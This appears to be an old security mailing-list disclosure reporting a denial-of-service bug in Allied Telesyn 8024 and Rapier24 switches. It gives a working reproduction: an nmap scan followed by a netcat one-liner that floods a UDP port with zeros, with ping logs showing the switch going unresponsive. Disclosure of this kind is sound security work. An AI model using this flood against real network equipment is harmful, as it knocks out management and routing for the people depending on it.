Hello, all The problem: Zero stream DoS switch! We have tested switches of Allied Telesyn, 8024 and Rapier24. We have installed the latest firmware from AT site. Testing: 1. Scan for open ports on switch (assume switch address 192.168.0.13): nmap -v -sT 192.168.0.13 Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ ) Host (192.168.0.103) appears to be up ... good. Initiating Connect() Scan against (192.168.0.103) Adding TCP port 23 (state open). Adding TCP port 80 (state open). The Connect() Scan took 4 seconds to scan 1542 ports. Interesting ports on (192.168.0.103): (The 1540 ports scanned but not shown below are in state: closed) Port State Service 23/tcp open telnet 80/tcp open http Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds 2. Send stream of zero to open port or any port in case 8024: cat /dev/zero | nc -u 192.168.0.13 Open_Port & Pinging 192.168.0.103 with 32 bytes of data: Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time=16ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Request timed out. // Start sending zero stream: cat /dev/zero | nc -u 192.168.0.103 6789 Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. Request timed out. // Stop sending zero stream Reply from 192.168.0.103: bytes=32 time=203ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 Reply from 192.168.0.103: bytes=32 time<10ms TTL=30 So, in case of 8024 it stops responding on management interface and in case Rapier24 it stops management interface access and routing also. The bug was reported to Allied Telesyn in July... Best Regards, Oleg A. Lebedev "Matrix Network Solutions" CIO
